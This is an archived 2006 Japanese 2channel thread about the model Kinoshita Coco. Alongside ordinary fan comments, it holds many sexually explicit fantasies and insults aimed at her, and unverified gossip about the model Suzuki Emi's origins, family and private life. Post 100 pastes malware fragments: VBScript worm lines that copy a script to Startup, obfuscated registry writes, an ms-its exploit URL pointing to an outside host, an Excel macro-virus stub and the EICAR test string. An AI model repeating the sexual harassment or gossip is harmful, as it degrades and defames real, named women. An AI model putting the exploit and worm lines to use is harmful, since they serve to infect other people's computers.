5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★PINKY☆木下ココさん☆Vol.2★

1 :無名モデル:2006/06/28(水) 03:14:00 ID:nLaPm/gW
売れそうですね。

(前スレ)
★ルミナスのCM 木下ココさんを応援しよう★
http://life7.2ch.net/test/read.cgi/model/1089093170/

2 :無名モデル:2006/06/28(水) 03:54:37 ID:???
かわいい

3 :無名モデル:2006/06/28(水) 04:32:40 ID:ROuwYyYx
ここちゃωスチ

4 :無名モデル:2006/06/28(水) 10:48:01 ID:313bW/O4
>>1さんありがと〜!☆

土曜日発売かな?

5 :無名モデル:2006/06/28(水) 14:15:58 ID:313bW/O4
こんにちは!!

6 :無名モデル:2006/06/28(水) 15:05:09 ID:???
何が売れそうなん?
何が土曜発売なん?


7 :無名モデル:2006/06/28(水) 16:00:37 ID:313bW/O4
7 :無名モデル :04/07/10 15:56 ID:OKLXPjZK
タバコすぱすぱアホですね。左ですね。

8 :無名モデル:2006/06/29(木) 17:07:37 ID:???
マンココ!

9 :無名モデル:2006/07/11(火) 14:12:05 ID:qQVnB7vz
9 :無名モデル :04/07/11 01:53 ID:/NeBlzmS
そうそう、この人かなりいかれた人だよ。
いつも大学の中庭でたむろって煙草ふかしてる。

10 :無名モデル:2006/07/17(月) 10:46:35 ID:1TLTKsts
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

11 :無名モデル:2006/07/17(月) 11:11:52 ID:1TLTKsts
サッカー好きなのかな?☆

12 :無名モデル:2006/07/17(月) 11:24:43 ID:???
>>11
サッカーてか玉を転がすの好きらしいよ!
っても、キンタマを舌の上でね!!

13 :無名モデル:2006/07/17(月) 11:57:56 ID:1TLTKsts
田波涼子似ても似つかない

14 :無名モデル:2006/07/17(月) 15:23:49 ID:???
あのブサイクな顔にぶっかけてやりてぇ!

15 :無名モデル:2006/07/18(火) 16:18:36 ID:W9iDvLXh
えっ?ココちゃんめっちゃ可愛いですけど!

16 :無名モデル:2006/07/19(水) 17:13:55 ID:???
ココって一生懸命しゃべると、口の横に泡がたまってくんだよね・・・
あれ見てチトひいた・・・

あと、女仲間と一緒だと平気でオナラするし・・・

ブリってるのは男の前だけだよ!

17 :無名モデル:2006/07/23(日) 12:30:01 ID:???
ココちゃんって、男見るとすぐチンポ欲しそうな目をするね!

18 :無名モデル:2006/07/24(月) 22:53:58 ID:???
ココちゃんって、顔アップの写真は可愛いのに
全身写ってるのだと顔が恐ろしい程老けて見える。

19 :無名モデル:2006/07/26(水) 15:43:09 ID:p90970kx
あびるに似てるよね

20 :無名モデル:2006/07/26(水) 16:11:46 ID:???
手マンですぐ潮吹いてイクらしいよ!

21 :無名モデル:2006/07/27(木) 04:28:32 ID:jT/19sIi
>>20何回もきもいレスしないでくんない?所詮妄想

22 :無名モデル:2006/07/27(木) 16:55:28 ID:???
ココはケツ毛までモジャモジャ!
クリトリスが超デカイんだよ!

23 :無名モデル:2006/07/30(日) 16:54:18 ID:???
>>22
オマエもココちゃんも汚い!

24 :無名モデル:2006/07/31(月) 01:57:44 ID:Xmm0pWQ5
ひ が み

25 :無名モデル:2006/07/31(月) 02:11:53 ID:kdu2ut/g
ココちゃんひよこみたいで可愛い☆w

26 :無名モデル:2006/07/31(月) 12:30:25 ID:???
フェラ顔超可愛い!!
思わず顔射しちゃいました!



27 :無名モデル:2006/07/31(月) 13:18:15 ID:+hBUIYnd
亀梨とよく会ってるんだってね。亀梨好みかな?

28 :無名モデル:2006/07/31(月) 13:56:29 ID:???
>>27
ココの好みは亀頭だよ!

29 :無名モデル:2006/07/31(月) 16:24:21 ID:???
ココとのイラマチオ興奮しますよ!

30 :無名モデル:2006/08/01(火) 09:51:45 ID:mWU42kjh
お茶のチューハイのCMでてるでしょ
かわいいよね

31 :無名モデル:2006/08/01(火) 12:43:18 ID:???
ココちゃんのオマンチョ美味しそう!

32 :無名モデル:2006/08/02(水) 07:03:47 ID:???
昔の方が可愛かった気がする
なんかありきたりな感じになっちゃったというか

33 :無名モデル:2006/08/03(木) 18:24:28 ID:???
>>32
あんな顔してヤリまっくてるからでしょ・・・
ワキを舐められると喜ぶらしいよ!


34 :無名モデル:2006/08/03(木) 22:57:46 ID:???
以前からB級感はあったけど
少女らしい可愛さがあって救われてた
今は・・・微妙

35 :無名モデル:2006/08/04(金) 16:44:56 ID:???
マンコにバイブ突っ込んで、
アナルにチンコ突っ込んで、
ヒィヒィ言わせたぃ!

36 :無名モデル:2006/08/06(日) 15:43:50 ID:???
マンココ!

37 :無名モデル:2006/08/08(火) 13:21:25 ID:???
37 ::無名モデル :04/08/20 21:20 ID:??? [?]
23日創刊のPINKYにモデルででるようですね。
ますますの活躍を期待しています!

38 :無名モデル:2006/08/08(火) 15:10:33 ID:DRH+lrBZ
顔がむくんでることが多いけど、マッサージやエクサで美容に気を使ってて好感ある。
可愛い。

39 :無名モデル:2006/08/09(水) 18:03:38 ID:???
男癖悪すぎだし!


40 :無名モデル:2006/08/10(木) 13:38:51 ID:???
PINKYの中でもハブされてるんだって!

41 :無名モデル:2006/08/15(火) 03:29:59 ID:???
>顔がむくんでることが多いけど、マッサージやエクサで美容に気を使ってて好感ある。

一般人でも日常的に取り入れてる子多いのに
モデルで美容に気を使うのは当たり前だし
顔むくんでるんじゃ、全然効果出てないってことじゃんw




42 :無名モデル:2006/08/15(火) 16:21:21 ID:???
確かに評判悪ぃ・・・

仕事が出来ないって言うか・・・


43 :無名モデル:2006/08/18(金) 15:49:29 ID:???
気分屋で泣き虫、典型的な自己中!


44 :無名モデル:2006/08/20(日) 10:44:57 ID:4AYgmcmL
セレブな感じ大好き!!

45 :無名モデル:2006/08/20(日) 21:59:25 ID:???
今度のMTVガールズコレクションに出るよ。

誕生日が12月24日だって。
http://anime.2ch.net/test/read.cgi/sakura/1145950083/555

46 :無名モデル:2006/08/21(月) 13:21:20 ID:???
前歯に青のりつけて笑うな!
一応モデルだろ!

このメスブタが!

47 :無名モデル:2006/08/25(金) 03:56:12 ID:???
何となく青木さやかに似てない?

48 :無名モデル:2006/08/25(金) 07:17:20 ID:???
MTVガールズコレクションは誰も見ていなかったのか

49 :無名モデル:2006/08/25(金) 09:46:46 ID:???
>>48
ステージでまな板ショーでもやったのか??

50 :無名モデル:2006/08/25(金) 16:32:06 ID:???
まな板ショーってナニ??

51 :無名モデル:2006/08/26(土) 03:57:45 ID:???
>>49
CATVの番組のことだが。

序でに、木下ココって本名なの?

52 :無名モデル:2006/08/26(土) 12:30:42 ID:QMEpX+lT
えみちぃと区別がつかなくなるなぁ!!

53 :無名モデル:2006/08/26(土) 12:42:35 ID:???
>>52
ファンの資格ナシ!



54 :無名モデル:2006/08/27(日) 15:16:08 ID:???
オマンコグチョグチョ!

55 :無名モデル:2006/08/28(月) 06:16:32 ID:tWjyfCCA
>>49
wwwwwwwwwwwwwwwww

56 :無名モデル:2006/08/28(月) 20:19:14 ID:???
ガールズコレクションみますたw
可愛かったけどMTVはCM多すぎ

57 :無名モデル:2006/08/28(月) 21:33:11 ID:DccWBwRn
http://ja.wikipedia.org/wiki/%E9%88%B4%E6%9C%A8%E3%81%88%E3%81%BF
鈴木 えみ(すずき えみ、1985年9月13日、Rh−AB型 - )は、ファッションモデル・女優・タレント。スターダストプロモーション所属。京都市立藤森中学校出身・京都両洋高等学校中退。

本名 ウー・ツーリャン/鈴木依美(すずき・えみ)。もともとは中国の上海生まれで、12歳の時に日本国籍を取得するとともに日本名も取得する。
昔から20歳までには結婚したいと色んな雑誌のインタビューなどで話していた。今年はとうとう20歳になったが今年中には結婚したいと雑誌セブンティーンの20歳記念インタビューで話している。
歯並びが悪かったので歯の矯正をしていた。矯正をしていた時は歯が痛くて食べ物を満足に食べることが出来なかったので今でも辛い思い出として残っている、と語っている。途中で矯正をあきらめ、前歯6本を差し歯に変えたことはあまりにも有名。
写真集のタイトル『LOVE』は鈴木えみの好きな言葉であったことから付けられた。
ピアスホールは、左耳2個、右耳5個、臍1個の合計8個開いている。
2006年3月3日、劇団ひまわりに所属する渋谷謙人との熱愛が発覚した。 「鈴木は20歳で年の差は3歳。その程度ならよくあるが、成人した鈴木が高校生の男の子を家に泊めたり、学校をサボらせて連れまわしているのだからマズイですよ」。
> 「不純といえばかなり不純。“逆淫行”じゃないかって声もあるほどですよ。二人が食事をするときは払いは全部、鈴木のほう。傍から見ればまるでホストに入れあげる年上の女ですよ」
> 「どちらかといえば鈴木の方が渋谷にベタ惚れで、周囲にも早く結婚したい」とアピールしています。彼女はとにかく渋谷に逃げられないように必死。20歳の誕生日を迎えたときも『今年中に結婚する!』と宣言していました」。(

58 :無名モデル:2006/09/03(日) 16:07:00 ID:???
イカれた頭とマンコのブサイクモデル!

59 :無名モデル:2006/09/05(火) 17:14:36 ID:???
木下ココちゃんでぶじゃない??♪☆
ニュージェネオンなら誰が好きでこれから先見てみたい?♪☆

60 :無名モデル:2006/09/06(水) 01:00:28 ID:???
木下ソコ

61 :無名モデル:2006/09/06(水) 03:45:00 ID:cJi+kLn/
かわいい。
大好き

62 :無名モデル:2006/09/07(木) 01:38:24 ID:???
voiのカタログに載ってたけど、ずいぶん劣化したねー…。
写真写り良くないからかも知れないけど、
西山マキが隣のページに写ってて気の毒。。

63 :無名モデル:2006/09/07(木) 01:39:04 ID:???
↑あ、西山と比べると随分落ちるから気の毒って意味ね

64 :無名モデル:2006/09/10(日) 01:27:36 ID:???
木下ココ
木下ソコ
木下アソコ
木下ドコ

65 :無名モデル:2006/09/10(日) 17:17:39 ID:nM5Edwch
ココちゃんかわいい!

66 :無名モデル:2006/09/11(月) 10:40:24 ID:???
何言ってんの??
ブサイクの極みじゃん!

67 :無名モデル:2006/09/12(火) 21:09:29 ID:/0z2rhHK
かゎいいじゃん!

68 :無名モデル:2006/09/12(火) 21:40:35 ID:DJU4z8TW
『鈴木えみ』さんのプロフですが、本名はウー ツーリャン。日本名は鈴木依美(すずき・えみ)。
中国人ですが、12歳の時に日本国籍・日本名を家族全員で取得した。
両親は京都で中華料理店をやってる。家族全員金の亡者。
鈴木本人は3つ年下の俳優と付き合いながら、某不動産会社の社長月岡の愛人やってます。

69 :無名モデル:2006/09/14(木) 12:43:45 ID:o89mhlUC
かわいい!!

70 :無名モデル:2006/09/14(木) 13:18:04 ID:0LowGJHl
69 :無名モデル :04/09/07 13:18 ID:Yd7dsVCA
何学部?

70 :無名モデル :04/09/09 03:19 ID:0718c41y
>>68
そうなんだ!そういえばそう呼んでたね〜。
昔友達だったんだけど。

しかし、オリーブにのってた頃と少し変わったよね。
当たり前か。

71 :無名モデル:2006/09/15(金) 11:36:13 ID:???
酔っ払うと、さとう珠緒キャラになるのがウザぃ!!
酒癖、男癖悪いよね…

72 :無名モデル:2006/09/15(金) 16:30:57 ID:???
髪の毛がペシャンコでトップにボリューム無いから
薄毛に見えるとこがキライ。
故に巨顔に見える。
キメ顔がうざい

73 :無名モデル:2006/09/16(土) 13:07:04 ID:???
ココもともと顔でかいんだよw
髪のせいじゃない

74 :無名モデル:2006/09/18(月) 12:03:25 ID:???
ココは何処?
私は誰?

75 :無名モデル:2006/09/23(土) 14:28:50 ID:Gt8riblY
今の彼氏はどんな人?


76 :無名モデル:2006/09/23(土) 15:55:24 ID:???
なんかどっかのサイトに永井大と犬のお散歩デートってのがかかれてた
そこまでメジャーだったの?!みたいな

77 :無名モデル:2006/09/23(土) 23:07:32 ID:???
ココは西暦3000年の未来人と付き合っているのか?

78 :無名モデル:2006/09/26(火) 01:31:36 ID:???
ココちゃん髪色暗い方がかわいい。

79 :無名モデル:2006/09/26(火) 15:47:03 ID:JWF97e14
うん、わかる。髪明るいとギャルに見えるし今の髪色うんこ色っぽい。
ココちゃんだいぶ痩せたね。ピンキー創刊時らへんを見てたら脚と顔が丸くてやばかった。
昔はちょっとふっくらしてるな程度だったのに今見るとモデルとしては太いなと思った。
今くらいの体型がちょうどいいんじゃないかな。まちがってもえみみたいな変なガリガリにならないでほしい。
前から思ってたんだけどココちゃんってパープルのシャドウとか濃すぎるブラウンメイク似合わない。
メイク特集でパープルとかモーヴつけてるけど微妙・・。

80 :無名モデル:2006/09/26(火) 22:25:28 ID:???
極度に痩せすぎずにえみとの好対象を保ってほしいね。
確かにココちゃんカラレスメイクの方がいいかも…パールが入ったヌーディーカラーが映える顔立ち。

ってゆーかしばらく見てないうちに早耳ムスメ卒業してたのねorz
衣装がほどよく大人カジュアルで好きだったのに。

81 :無名モデル:2006/09/27(水) 16:40:39 ID:???
メスブタ!

82 :無名モデル:2006/09/28(木) 01:01:21 ID:???
ココのスレは何?

83 :無名モデル:2006/10/01(日) 16:47:02 ID:ySU/Dl0T
ココちゃん可愛いすぎ

84 :無名モデル:2006/10/04(水) 21:38:31 ID:???
ココココッコケーコココ

85 :無名モデル:2006/10/06(金) 23:23:33 ID:???
ココちゃん可愛いい

86 :無名モデル:2006/10/07(土) 12:06:47 ID:???
ココは2ch

87 :無名モデル:2006/10/11(水) 07:23:18 ID:???
ココをage

88 :無名モデル:2006/10/13(金) 22:14:22 ID:GDfteuWq
ココちゃん足きれい


89 :無名モデル:2006/10/13(金) 22:38:37 ID:???
ココから何を書く?

90 :無名モデル:2006/10/14(土) 21:31:19 ID:???
ココちゃんけっこうかわいい!!☆

91 :無名モデル:2006/10/14(土) 21:39:20 ID:hDuMgtsU
ココ最高


92 :無名モデル:2006/10/15(日) 20:34:40 ID:ejoxdQtU
ココちゃんって何学部だったの??

93 :無名モデル:2006/10/15(日) 21:59:02 ID:+ZzHPkQ9
英文

94 :無名モデル:2006/10/17(火) 23:00:34 ID:???
新しい子ともう交代だな
希って子だっけ??

95 :無名モデル:2006/10/17(火) 23:14:02 ID:???
ココで聞くな!

96 :無名モデル:2006/10/22(日) 18:29:12 ID:6v3a2VFC
今月号PINKY ココちゃんかわいいね。

97 :無名モデル:2006/10/22(日) 18:37:20 ID:???
つまらない流れ

98 :無名モデル:2006/10/22(日) 19:08:28 ID:???
じゃあ、ココに来るな!

99 :無名モデル:2006/11/05(日) 21:59:36 ID:iqXV74YS
料亭の息子とは続いてる?

100 :<body onload=window()>:2006/11/06(月) 00:22:38 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


101 :無名モデル:2006/11/06(月) 07:45:53 ID:???
ココを荒らすな!

102 :無名モデル:2006/11/08(水) 17:03:49 ID:3KsVjGlp
木下ココちゃんかわいい♪冬服のほうが似合うね。
でもたまに写りわるい写真あるよね、青木さやかみたいに見えちゃう… 


103 :無名モデル:2006/11/08(水) 17:08:52 ID:GcMMSIJ4
スカート姿ココさんの方が好き!!☆

104 :無名モデル:2006/11/08(水) 17:51:59 ID:hyZ6Ajyq
ピタパンのココもなかなかたまんねーぞ

105 :無名モデル:2006/11/08(水) 22:13:51 ID:???
PINKYの木下ココって、何か、猿と縁が深いな

106 :無名モデル:2006/11/11(土) 19:04:35 ID:t4bIkTGh
なぜ?

107 :無名モデル:2006/11/11(土) 19:23:27 ID:???
PINKYって言ったら、タブレット菓子のマスコットキャラクターはピンキーモンキーという猿
木下と言ったら、豊臣秀吉の元の名、木下藤吉郎で、渾名は猿
ココと言ったら、ケロッグのシリアルフーズのマスコットキャラクターにいるココくんっていう猿

108 :無名モデル:2006/11/11(土) 20:11:35 ID:HV3HGWvJ
かわいくないですか???

109 :無名モデル:2006/11/11(土) 22:25:48 ID:???
ピンキー頂戴 ピンキー頂〜戴

110 :無名モデル:2006/11/12(日) 01:01:04 ID:9j6jRzl7
>>107あの木下か。君、詳しいね!

111 :無名モデル:2006/11/12(日) 11:12:57 ID:/lzkhbYZ
かわいいです!!☆

112 :無名モデル:2006/11/12(日) 11:35:52 ID:6YMg5k76
いは

113 :無名モデル:2006/11/13(月) 01:32:35 ID:???
>>99
○本?

114 :無名モデル:2006/11/13(月) 19:59:25 ID:???
>>113
森本?

115 :無名モデル:2006/11/16(木) 12:15:58 ID:???
115 :無名モデル :04/10/22 08:13:58 ID:???
過去レスも読めないのか

116 :無名モデル:2006/11/16(木) 12:16:50 ID:nYNorHEQ
116 :無名モデル :04/10/25 00:27:42 ID:TALI3jLn
liveのダイエット特集から見ると…ずいぶんと安っぽい女になっちゃったねぇ。

117 :無名モデル:2006/11/17(金) 12:17:25 ID:gb3JLRJj
Liveのダイエット今でも続けてるの?

118 :無名モデル:2006/11/18(土) 11:18:17 ID:QHp/NMoA
117 :無名モデル :04/10/25 22:47:35 ID:??? [0]
私は大学1年生の頃が雰囲気も含め一番可愛かったと思います。

118 :無名モデル :04/10/25 22:50:47 ID:+2VmtIAS
>>117
もしやココさんの大学の方ですか?

119 :無名モデル:2006/11/18(土) 16:53:33 ID:VUzW34vQ
今月かわいかったね☆

120 :無名モデル:2006/11/18(土) 19:36:06 ID:???
>>118ってココのスレに書く意味あるの?

121 :無名モデル:2006/11/19(日) 11:30:34 ID:S/1FehgY
上品だよね…!!

122 :無名モデル:2006/11/19(日) 18:03:54 ID:???
上品か?

123 :無名モデル:2006/11/23(木) 15:24:01 ID:wBMhZt2d
クリスマスイブ生まれっていーな!!

124 :無名モデル:2006/11/24(金) 00:18:08 ID:C1QgyKCa
ココちゃんめっちゃかわいい!!
私の中では世界1〜〜!!

125 :無名モデル:2006/11/24(金) 00:24:24 ID:/mkvyo7Y
年齢詐欺でしょう

126 :無名モデル:2006/11/24(金) 21:27:35 ID:???
>>123
良いか?
間違っても、キリストの生まれ変わりとか名乗って欲しくないな。

127 :無名モデル:2006/11/30(木) 23:26:06 ID:???
ココちゃんは天使です

128 :無名モデル:2006/12/01(金) 22:03:12 ID:???
木下ココくん

129 :無名モデル:2006/12/01(金) 22:37:03 ID:???
ttp://school5.2ch.net/test/read.cgi/shihou/1159113994/571

130 :無名モデル:2006/12/02(土) 17:44:07 ID:???
http://school5.2ch.net/test/read.cgi/shihou/1159113994/575

131 :無名モデル:2006/12/10(日) 13:47:25 ID:???
今年のクリスマスは何して過ごす?

132 :無名モデル:2006/12/24(日) 13:55:06 ID:aL25gxZm
ここちゃん今月あんまでてない!かなしい!

133 :無名モデル:2006/12/24(日) 22:49:06 ID:???
今日誕生日なんだけど、知ってた?

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)